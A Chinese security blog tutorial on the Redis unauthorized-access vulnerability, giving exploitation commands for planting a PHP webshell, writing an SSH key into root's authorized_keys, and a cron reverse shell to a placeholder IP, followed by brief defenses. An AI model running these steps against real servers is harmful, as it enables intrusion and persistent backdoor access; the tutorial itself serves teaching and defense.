Redis未授权访问漏洞详解(全面)

已于 2024-05-28 15:20:22 修改
阅读量3.4k 收藏 48
点赞数 15
分类专栏: 内网安全 数据库 文章标签: redis 数据库 缓存
于 2024-02-26 19:40:54 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64481831/article/details/136301679
版权

这个漏洞造成原因是因为配置不当的问题,没有非常复杂的原理。这个漏洞一般位于内网之中,能利用好Redis漏洞往往能够顺利拿下服务器权限,所以也还是很重要的。

目录

Redis简单介绍

Redis未授权访问漏洞介绍

利用条件

影响版本

漏洞检测

漏洞危害

Redis写入webshell

原理

利用条件

利用过程

Redis写入SSH公钥

原理

利用条件

利用过程

Redis写入计划任务反弹shell

原理

利用条件

利用过程

Redis未授权访问漏洞防御

总结

Redis简单介绍

Redis是一款内存高速缓存的数据库,是一款K-V型数据库,它的所有键值都是用字典来存储的。其中它的value支持多种数据类型,包括String、List、Set、Zset和Hash。

Redis未授权访问漏洞介绍

利用条件

  • Redis默认情况下绑定在127.0.0.1:6379,在没有进行采用相关的策略,如添加防火墙规则避免其他非信任来源ip访问,就会将Redis服务暴露在公网上;
  • 并且Redis默认情况是空密码连接
  • 在服务器以root身份运行Redis时

这将导致任意用户可以访问目标服务器下未授权访问Redis以及读取Redis数据。

影响版本

Redis2.x-5.x

漏洞检测

一般使用nmap工具对目标机器进行扫描。如果发现主机的6379端口是对外开放的,并且目标主机开放外网访问的情况下,就能够在本机使用redis-cli服务连接目标服务器。

redis-cli -h 服务器ip

漏洞危害

  • 攻击者无需通过认证就可以访问内部数据,导致敏感信息泄露
  • 攻击者可以恶意执行flushall来清空所有数据
  • 攻击者可通过eval执行lua代码,或通过数据备份功能往磁盘写入后门文件

eval()是用来执行一个字符串表达式,并返回表达式的值。

lua是一种脚本语言,用C语言编写,源码开放,其设计目的是为了嵌入程序应用,为应用程序提供便利的拓展功能。

  • 由于Redis以root权限运行,攻击者可以给root账户写入SSH公钥文件,直接通过SSH登录目标服务器

Redis写入webshell

原理

Redis为了持久化连接,将数据保存在了本地。那么攻击者可以将后门代码作为value值,写入web目录下的.php文件,就可实现php的webshell。

利用条件

  • 当存在未授权访问漏洞时,可以直接通过Redis连接靶机;
  • 如果靶机正好开启web服务;
  • 且攻击者知道了web目录的路径且该路径具有文件读写的权限。

这时候攻击者可以通过Redis写入webshell。

利用过程

以下为举例:

config set dir /var/www.html/        #切换到web写入目录
config set dbfilename zcc.php        #设置写入木马的文件名
set xxx "\n\n\n<?php @eval($_POST['zcc']);?>\n\n\n"        #写入恶意代码到内存中,这里的换行符是必要的,因为用Redis写入文件会自带一些版本信息,如果不换行可能执行不了
save        #将内存中的数据导出到磁盘

Redis写入SSH公钥

原理

在Redis数据库中插入一条数据,将本机的公钥作为value,然后通过修改数据库的默认路径为/root/.ssh(ssh文件夹)和默认的缓冲文件authorized.keys(公钥文件),把缓冲的数据保存在文件里,这样就可以在服务器端的/root/.ssh下生成一个授权的key。

利用条件

  • 通过漏洞成功连接Redis之后;
  • 且Redis服务以root权限执行;
  • 以及安全模式protected-mode处于关闭状态;
  • 服务器开启了ssh服务,且允许密钥登录。将密钥等配置信息存放在/root/.ssh目录(安装了openssh只要将公钥放入到/root/.ssh文件夹中,无需设置默认就允许使用公钥登录),

即可远程写入一个公钥,直接登录远程服务器。

利用过程

ssh-keygen -t rsa
config set dir /root/.ssh
config set dbfilename authorized_keys
set x "\n\n\nssh-rsa ...公钥...\n\n\n"
save

连接:

ssh -i id_rsa root@ip

Redis写入计划任务反弹shell

原理

在数据库中插入一条数据,将计划任务的内容作为value值,然后通过修改数据库的默认路径为目标主机计划任务的路径,把缓冲的数据保存在文件里,这样就可以一个计划任务进行反弹shell。

利用条件

  • 能够远程连接到Redis
  • 安全模式protectcd-mode处于关闭模式
  • 以root权限运行

利用过程

set x "\n\n****bash -i >& /dev/tcp/xx.xx.xx.xx/8089 0>&1 \n\n"
config setdir /var/spool/cron
config set dbfilename root
save

Redis未授权访问漏洞防御

  • 限制访问IP
  • 修改默认端口
  • 使用密码登录,限制密钥登录
  • 不使用root运行Redis

总结

  • Redis未授权访问漏洞是由于配置问题而产生的漏洞,因为没有改变默认端口6379且没有限制外来IP访问导致的漏洞。
  • Redis未授权漏洞一般可以用来写入webshell、写入ssh公钥进行登录、写入任务反弹shell连接
  • 这些漏洞原理本质就是能够远程连接上Redis,且能够有root权限进行修改文件,然后将想要实现的内容写入就可以达成目的
  • Redis未授权漏洞的防御针对以上几点大概有:限制访问IP、修改默认端口、不使用密钥登录、不使用root权限运行Redis。

!!!!!!!!!!!!!!!!.
关注
  • 15
    点赞
  • 48
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
Redis授权访问漏洞
周星星的博客
08-22 1524
Redis授权访问漏洞复现以及利用
漏洞复现之Redis授权访问
m0_56190544的博客
09-13 2511
本文详细介绍了redis授权访问漏洞的原理以及利用方法,供大家参考学习
redis 授权访问漏洞详解
m0_69043895的博客
04-22 1376
1、redis 绑定在6379端口,且没有进行添加防火墙规则避免其他非信任来源ip访问等相关安全策略,直接暴露在公网。2、没有设置密码认证(默认密码为空),可以免密码远程登录redis服务。
授权访问漏洞(及其修复方法)---看这一篇就够!!
最新发布
C233333235的博客
08-05 1563
Redis 默认情况下,会绑定在 0.0.0.0:6379 ,如果没有进⾏采⽤相关的策略,⽐如添加防 ⽕墙规则避免其他⾮信任来源 ip 访问等,这样将会将 Redis 服务暴露到公⽹上,如果在没有设 置密码认证(⼀般为空)的情况下,会导致任意⽤户在可以访问⽬标服务器的情况下授权Redis 以及读取 Redis 的数据。
redis授权访问漏洞
Naive的博客
05-28 1480
Redis安装后,如果绑定在,并且没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公网上。攻击者在授权访问 Redis 的情况下,利用 Redis 自身的提供的config命令,可以进行写文件操作,攻击者可以成功将自己的ssh公钥写入目标服务器的/root/.ssh文件夹的。
redis 授权访问漏洞
weixin_60719780的博客
03-02 2137
Redis默认情况下,会绑定在0.0.0.0:6379(在redis3.2之后,redis增加了protected-mode,在这个模式下,非绑定IP或者没有配置密码访问时都会报错),如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源ip访问等等,这样将会将Redis服务暴露在公网上,如果在没有设置密码认证(默认为空)的情况下,会导致任意用户在可以访问目标服务器的情况下授权访问Redis以及读取Redis的数据。(2) 没有设置密码认证(默认为空)或者弱密码,可以免密码登录redis服务。
授权访问漏洞-Redis授权访问漏洞
HAKUNAMATATATTA的博客
11-29 3861
授权访问漏洞可以理解为需要安全配置或权限认证的地址、授权页面配置不当导 致其他用户可以无需认证授权直接访问从而引发重要权限可被操作、数据库或网站目录等敏感信息泄露。Redis 是完全开源免费的,一个灵活的高性能 key-value 数据结构存储,可以用来作为数据库缓存和消息队列。
Redis安全策略与访问控制详解
# 1. Redis安全策略概述 ...数据泄露、授权访问和数据篡改等安全问题不仅会给用户带来重大损失,还会对组织的声誉和信誉产生不良影响。 ## 1.2 常见的Redis安全威胁 在 Redis 中,常见的安全威胁包括: -
Linux云服务器管理指南:从实例配置到性能优化,全面掌握云端服务器管理(5个步骤详解
[Linux云服务器管理指南:从实例配置到性能优化,全面掌握云端服务器管理(5个步骤详解)](https://media.geeksforgeeks.org/wp-content/uploads/20230921115433/dns-image-(1).png) # 1. Linux云服务器基础** **...
Java中高级核心知识全面解析——认证授权(Token-认证)
青山绿轻舟
06-13 842
一、Token 认证的优势 相比于 Session 认证的方式来说,使用 token 进行身份认证主要有下面三个优势: 1.无状态 token 自身包含了身份验证所需要的所有信息,使得我们的服务器不需要存储 Session 信息,这显然增加了系统的可用性和伸缩性,大大减轻了服务端的压力。但是,也正是由于 token 的无状态,也导致了它最大的缺点:当后端在token 有效期内废弃一个 token 或者更改它的权限的话,不会立即生效,一般需要等到有效期过后才可以。另外,当用户 Logout 的话,token
10分钟详解Spring全家桶7大知识点
Moonxiyue的博客
05-30 974
Spring框架自诞生以来一直备受开发者青睐,有人亲切的称之为:Spring 全家桶。它包括SpringMVC、SpringBoot、Spring Cloud、Spring Cloud Dataflow等解决方案。 很多研发人员把spring看作心目中最好的java项目,没有之一。 所以这是重点也是难点,工作中必须会,面试时肯定考。 那么,今天花费10分钟,梳理Spring框架相关知识。 Spring知识点-汇总 spring系列包含非常多的项目,可以满足java开发中的方方面面。 先来看常
40000+字超强总结?阿里P8把Java全栈知识体系详解整理成这份PDF
xiaohao718的博客
06-27 1277
40000 +字长文总结,已将此文整理成PDF文档了,需要的见文后下载获取方式。全栈知识体系总览Java入门与进阶面向对象与Java基础基础知识点复习完了以后,我们需要深入的理解Java中的一些基础机制:A. Java进阶 - Java 集合框:Java 集合框架应用是极其广泛的,对于其总体框架用法及源码都必要深刻理解。B. Java进阶 - Java 集合框之 Collection源码解读:对核心的Collection类进行源码解读。C. Java进阶 - Java 集合框之 Map & Set 源码解读
Redis 授权访问漏洞(附Python脚本)
09-21 799
&#13; 0x01 环境搭建&#13; &#13; #下载并安装&#13; cd /tmp&#13; wget http://download.redis.io/releases/redis-2.8.17.tar.gz&#13; tar xzf redis-2.8.17.tar.gz&#13; cd redis-2.8.17&#13; make&#13; #启动redis服...
Redis授权漏洞的危害
04-04
Redis授权漏洞的危害包括但不限于以下几点: 1. 数据泄露:攻击者可以通过访问Redis授权的服务,获取到Redis中存储的敏感数据,例如用户密码、数据库信息、业务数据等。 2. 数据篡改:攻击者可以通过访问Redis授权的服务,对Redis中存储的数据进行篡改,导致业务数据的丢失或者损坏。 3. 服务拒绝:攻击者可以通过访问Redis授权的服务,对Redis进行拒绝服务攻击,导致服务不可用,影响业务正常运行。 4. 系统入侵:攻击者可以通过访问Redis授权的服务,获取到服务器的权限,从而进一步入侵系统,导致更严重的安全问题。 因此,及时发现和修复Redis授权漏洞,对于保障系统的安全和稳定运行至关重要。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值